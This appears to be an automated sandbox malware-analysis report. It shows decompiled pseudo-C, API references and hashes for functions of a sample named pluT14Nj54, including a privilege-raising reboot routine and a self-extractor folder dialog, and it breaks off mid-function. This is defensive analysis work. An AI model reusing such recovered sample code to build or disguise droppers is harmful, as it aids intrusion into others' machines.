                                                                                                                                                                                                    • Instruction ID: 4be7a354b1cbf682e09299ad20bfb8a8fa70a3e4791bcaca366f951e637d5ee9
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54bd1d80671d6666de93fff88415052b2ce14f29f84dbecb62ff6b50cdde351a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 68D16871E08E459FDF378B388C497FA3BA9AB56340F1501ABC4C6D6591DA728EC68F40
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                                                                    			E00391F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                    				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                    				void* _v28;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				int _t28;
                                                                                                                                                                                                    				signed char _t30;
                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                    				void* _t41;
                                                                                                                                                                                                    				signed int _t46;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t41 = __esi;
                                                                                                                                                                                                    				_t38 = __edi;
                                                                                                                                                                                                    				_t30 = __ecx;
                                                                                                                                                                                                    				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                    						if( *0x399a40 != 0) {
                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                    							_t13 =  *0x398004; // 0x74c05eb4
                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								E003944B9(0, _t37);
                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                    							return E00396CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                    						_t28 = E003944B9(0, 0x522, 0x391140, 0, 0x40, 4);
                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					__eax = E00391EA7(__ecx);
                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x00391f90
                                                                                                                                                                                                    0x00391f90
                                                                                                                                                                                                    0x00391f93
                                                                                                                                                                                                    0x00391f98
                                                                                                                                                                                                    0x00391fa4
                                                                                                                                                                                                    0x00391fa7
                                                                                                                                                                                                    0x00391fc5
                                                                                                                                                                                                    0x00391fcd
                                                                                                                                                                                                    0x00391fdb
                                                                                                                                                                                                    0x00391ee5
                                                                                                                                                                                                    0x00391eea
                                                                                                                                                                                                    0x00391ef1
                                                                                                                                                                                                    0x00391ef4
                                                                                                                                                                                                    0x00391f0c
                                                                                                                                                                                                    0x00391f2e
                                                                                                                                                                                                    0x00391f3a
                                                                                                                                                                                                    0x00391f46
                                                                                                                                                                                                    0x00391f4d
                                                                                                                                                                                                    0x00391f58
                                                                                                                                                                                                    0x00391f60
                                                                                                                                                                                                    0x00391f61
                                                                                                                                                                                                    0x00391f62
                                                                                                                                                                                                    0x00391f75
                                                                                                                                                                                                    0x00391f80
                                                                                                                                                                                                    0x00391f77
                                                                                                                                                                                                    0x00391f77
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391f77
                                                                                                                                                                                                    0x00391f64
                                                                                                                                                                                                    0x00391f64
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391f64
                                                                                                                                                                                                    0x00391f0e
                                                                                                                                                                                                    0x00391f0e
                                                                                                                                                                                                    0x00391f13
                                                                                                                                                                                                    0x00391f13
                                                                                                                                                                                                    0x00391f14
                                                                                                                                                                                                    0x00391f14
                                                                                                                                                                                                    0x00391f16
                                                                                                                                                                                                    0x00391f17
                                                                                                                                                                                                    0x00391f1a
                                                                                                                                                                                                    0x00391f1f
                                                                                                                                                                                                    0x00391f1f
                                                                                                                                                                                                    0x00391f86
                                                                                                                                                                                                    0x00391f8f
                                                                                                                                                                                                    0x00391fcf
                                                                                                                                                                                                    0x00391fd3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391fd3
                                                                                                                                                                                                    0x00391fa9
                                                                                                                                                                                                    0x00391fb4
                                                                                                                                                                                                    0x00391fbb
                                                                                                                                                                                                    0x00391fc3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391fc3
                                                                                                                                                                                                    0x00391f9a
                                                                                                                                                                                                    0x00391f9a
                                                                                                                                                                                                    0x00391fa2
                                                                                                                                                                                                    0x00391fd9
                                                                                                                                                                                                    0x00391fda
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00391fa2

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00391EFB
                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 00391F02
                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00391FD3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                    • Opcode ID: 0649b190c3357fbb600057220a322c3568ee933620aa04886ec0cba3002a227f
                                                                                                                                                                                                    • Instruction ID: b622eb06ed64d21cb7168dc2a26577b540c02ddc8e32b019614c588e487260bd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0649b190c3357fbb600057220a322c3568ee933620aa04886ec0cba3002a227f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9321C771B4020A7BDF235BA59C4AFBF77BCEB85B50F11021AFA03F6181D775880196A5
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00396CF0(char _a4) {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                    				_t1 =  &_a4; // 0x396e26
                                                                                                                                                                                                    				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00396cf7
                                                                                                                                                                                                    0x00396cfd
                                                                                                                                                                                                    0x00396d00
                                                                                                                                                                                                    0x00396d19

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00396E26,00391000), ref: 00396CF7
                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(&n9,?,00396E26,00391000), ref: 00396D00
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,00396E26,00391000), ref: 00396D0B
                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00396E26,00391000), ref: 00396D12
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                    • String ID: &n9
                                                                                                                                                                                                    • API String ID: 3231755760-1744448865
                                                                                                                                                                                                    • Opcode ID: 314b99d809860720527ce042c4479112880fca2b9a7f0ce5e9e76239e916e2b5
                                                                                                                                                                                                    • Instruction ID: 192dd37470b0ad9a7c42f6e7d706dba5cd1ac8382f7d2e3899a19120ce56e6c0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 314b99d809860720527ce042c4479112880fca2b9a7f0ce5e9e76239e916e2b5
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 66D0C932004908BBDB022BE5EC0CA593F2CEB88313F444102F31A82030CA3348518B92
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                    			E00393210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                    					E003943D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                    					SetWindowTextA(_t64, "nst0dum");
                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                    					__eflags =  *0x399a40 - _t42; // 0x3
                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0x3991e4, 0x104);
                                                                                                                                                                                                    						__eflags = _t21;
                                                                                                                                                                                                    						if(_t21 == 0) {
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							_t58 = 0x4bf;
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                    							E003944B9(_t64, _t58);
                                                                                                                                                                                                    							goto L39;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t49 = 0x3991e4;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t23 =  *_t49;
                                                                                                                                                                                                    							_t49 =  &(_t49[1]);
                                                                                                                                                                                                    							__eflags = _t23;
                                                                                                                                                                                                    						} while (_t23 != 0);
                                                                                                                                                                                                    						__eflags = _t49 - 0x3991e5 - 3;
                                                                                                                                                                                                    						if(_t49 - 0x3991e5 < 3) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t24 =  *0x3991e5; // 0x3a
                                                                                                                                                                                                    						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                    						if(_t24 == 0x3a) {
                                                                                                                                                                                                    							L21:
                                                                                                                                                                                                    							_t25 = GetFileAttributesA(0x3991e4);
                                                                                                                                                                                                    							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                    							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                    								L26:
                                                                                                                                                                                                    								E0039658A(0x3991e4, 0x104, 0x391140);
                                                                                                                                                                                                    								_t27 = E003958C8(0x3991e4);
                                                                                                                                                                                                    								__eflags = _t27;
                                                                                                                                                                                                    								if(_t27 != 0) {
                                                                                                                                                                                                    									__eflags =  *0x3991e4 - 0x5c;
                                                                                                                                                                                                    									if( *0x3991e4 != 0x5c) {
                                                                                                                                                                                                    										L30:
                                                                                                                                                                                                    										_t30 = E0039597D(0x3991e4, 1, _t64, 1);
                                                                                                                                                                                                    										__eflags = _t30;
                                                                                                                                                                                                    										if(_t30 == 0) {
                                                                                                                                                                                                    											L35:
                                                                                                                                                                                                    											_t42 = 1;
                                                                                                                                                                                                    											__eflags = 1;
                                                                                                                                                                                                    											goto L36;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                    										_t42 = 1;
                                                                                                                                                                                                    										EndDialog(_t64, 1);
                                                                                                                                                                                                    										goto L36;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *0x3991e5 - 0x5c;
                                                                                                                                                                                                    									if( *0x3991e5 == 0x5c) {
                                                                                                                                                                                                    										goto L31;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L30;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t58 = 0x4be;
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t32 = E003944B9(_t64, 0x54a, 0x3991e4, 0, 0x20, 4);
                                                                                                                                                                                                    							__eflags = _t32 - 6;
                                                                                                                                                                                                    							if(_t32 != 6) {
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t33 = CreateDirectoryA(0x3991e4, 0);
                                                                                                                                                                                                    							__eflags = _t33;
                                                                                                                                                                                                    							if(_t33 != 0) {
                                                                                                                                                                                                    								goto L26;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x10);
                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                    							_push(0x3991e4);
                                                                                                                                                                                                    							_t58 = 0x4cb;
                                                                                                                                                                                                    							goto L25;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags =  *0x3991e4 - 0x5c;
                                                                                                                                                                                                    						if( *0x3991e4 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                    						if(_t24 != 0x5c) {
                                                                                                                                                                                                    							goto L32;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t34 = _t20 - 1;
                                                                                                                                                                                                    					__eflags = _t34;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						EndDialog(_t64, 0);
                                                                                                                                                                                                    						 *0x399124 = 0x800704c7;
                                                                                                                                                                                                    						goto L39;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t34 != 0x834;
                                                                                                                                                                                                    					if(_t34 != 0x834) {
                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t37 = LoadStringA( *0x399a3c, 0x3e8, 0x398598, 0x200);
                                                                                                                                                                                                    					__eflags = _t37;
                                                                                                                                                                                                    					if(_t37 != 0) {
                                                                                                                                                                                                    						_t38 = E00394224(_t64, _t46, _t46);
                                                                                                                                                                                                    						__eflags = _t38;
                                                                                                                                                                                                    						if(_t38 == 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t39 = SetDlgItemTextA(_t64, 0x835, 0x3987a0);
                                                                                                                                                                                                    						__eflags = _t39;
                                                                                                                                                                                                    						if(_t39 != 0) {
                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t63 = 0x4c0;
                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                    						E003944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L38;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_t63 = 0x4b1;
                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}

























                                                                                                                                                                                                    0x0039321b
                                                                                                                                                                                                    0x0039321e
                                                                                                                                                                                                    0x00393221
                                                                                                                                                                                                    0x0039343c
                                                                                                                                                                                                    0x0039343e
                                                                                                                                                                                                    0x0039343f
                                                                                                                                                                                                    0x00393445
                                                                                                                                                                                                    0x00393447
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393447
                                                                                                                                                                                                    0x00393229
                                                                                                                                                                                                    0x0039322a
                                                                                                                                                                                                    0x0039322f
                                                                                                                                                                                                    0x003933ec
                                                                                                                                                                                                    0x003933f7
                                                                                                                                                                                                    0x00393410
                                                                                                                                                                                                    0x00393416
                                                                                                                                                                                                    0x0039341d
                                                                                                                                                                                                    0x0039342d
                                                                                                                                                                                                    0x0039342d
                                                                                                                                                                                                    0x00393438
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393438
                                                                                                                                                                                                    0x00393237
                                                                                                                                                                                                    0x00393243
                                                                                                                                                                                                    0x00393243
                                                                                                                                                                                                    0x00393246
                                                                                                                                                                                                    0x003932ee
                                                                                                                                                                                                    0x003932f4
                                                                                                                                                                                                    0x003932f6
                                                                                                                                                                                                    0x003933d4
                                                                                                                                                                                                    0x003933d6
                                                                                                                                                                                                    0x003933db
                                                                                                                                                                                                    0x003933dc
                                                                                                                                                                                                    0x003933de
                                                                                                                                                                                                    0x003933df
                                                                                                                                                                                                    0x00393370
                                                                                                                                                                                                    0x00393372
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393372
                                                                                                                                                                                                    0x003932fc
                                                                                                                                                                                                    0x00393301
                                                                                                                                                                                                    0x00393301
                                                                                                                                                                                                    0x00393303
                                                                                                                                                                                                    0x00393304
                                                                                                                                                                                                    0x00393304
                                                                                                                                                                                                    0x0039330a
                                                                                                                                                                                                    0x0039330d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393313
                                                                                                                                                                                                    0x00393318
                                                                                                                                                                                                    0x0039331a
                                                                                                                                                                                                    0x00393331
                                                                                                                                                                                                    0x00393332
                                                                                                                                                                                                    0x0039333a
                                                                                                                                                                                                    0x0039333d
                                                                                                                                                                                                    0x0039337c
                                                                                                                                                                                                    0x00393388
                                                                                                                                                                                                    0x0039338f
                                                                                                                                                                                                    0x00393394
                                                                                                                                                                                                    0x00393396
                                                                                                                                                                                                    0x003933a4
                                                                                                                                                                                                    0x003933ab
                                                                                                                                                                                                    0x003933b6
                                                                                                                                                                                                    0x003933be
                                                                                                                                                                                                    0x003933c3
                                                                                                                                                                                                    0x003933c5
                                                                                                                                                                                                    0x00393435
                                                                                                                                                                                                    0x00393437
                                                                                                                                                                                                    0x00393437
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393437
                                                                                                                                                                                                    0x003933c7
                                                                                                                                                                                                    0x003933c9
                                                                                                                                                                                                    0x003933cc
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003933cc
                                                                                                                                                                                                    0x003933ad
                                                                                                                                                                                                    0x003933b4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003933b4
                                                                                                                                                                                                    0x00393398
                                                                                                                                                                                                    0x00393399
                                                                                                                                                                                                    0x0039339b
                                                                                                                                                                                                    0x0039339c
                                                                                                                                                                                                    0x0039339d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039339d
                                                                                                                                                                                                    0x0039334c
                                                                                                                                                                                                    0x00393351
                                                                                                                                                                                                    0x00393354
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039335c
                                                                                                                                                                                                    0x00393362
                                                                                                                                                                                                    0x00393364
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393366
                                                                                                                                                                                                    0x00393367
                                                                                                                                                                                                    0x00393369
                                                                                                                                                                                                    0x0039336a
                                                                                                                                                                                                    0x0039336b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039336b
                                                                                                                                                                                                    0x0039331c
                                                                                                                                                                                                    0x00393323
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393329
                                                                                                                                                                                                    0x0039332b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039332b
                                                                                                                                                                                                    0x0039324c
                                                                                                                                                                                                    0x0039324c
                                                                                                                                                                                                    0x0039324f
                                                                                                                                                                                                    0x003932c8
                                                                                                                                                                                                    0x003932ce
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003932ce
                                                                                                                                                                                                    0x00393251
                                                                                                                                                                                                    0x00393256
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00393271
                                                                                                                                                                                                    0x00393277
                                                                                                                                                                                                    0x00393279
                                                                                                                                                                                                    0x00393298
                                                                                                                                                                                                    0x0039329d
                                                                                                                                                                                                    0x0039329f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003932b0
                                                                                                                                                                                                    0x003932b6
                                                                                                                                                                                                    0x003932b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x003932be
                                                                                                                                                                                                    0x00393280
                                                                                                                                                                                                    0x00393289
                                                                                                                                                                                                    0x0039328e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039328e
                                                                                                                                                                                                    0x0039327b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0039327b
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00398598,00000200), ref: 00393271
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 003933E2
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 003933F7
                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00393410
                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00393426
                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0039342D
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0039343F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.388896467.0000000000391000.00000020.00000001.01000000.00000004.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.388879270.0000000000390000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388913979.0000000000398000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000001.00000002.388924308.000000000039C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_390000_pluT14Nj54.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$nst0dum
                                                                                                                                                                                                    • API String ID: 2418873061-1739013265
                                                                                                                                                                                                    • Opcode ID: 854b2044782dc40b2e7f013c956ff05bc14f346d5e63ccf2d6da02c48f701d1a
                                                                                                                                                                                                    • Instruction ID: 1f17abcccf3b9c81acc2d56d253fa03dc44cf75e536440237567c405e2f947e3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 854b2044782dc40b2e7f013c956ff05bc14f346d5e63ccf2d6da02c48f701d1a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4D517DB03802417BEF231B3A5C8CF7F2A5CEB46B44F51412AF246D61D0CAA58E02D3A2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                    			E00392CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t27;
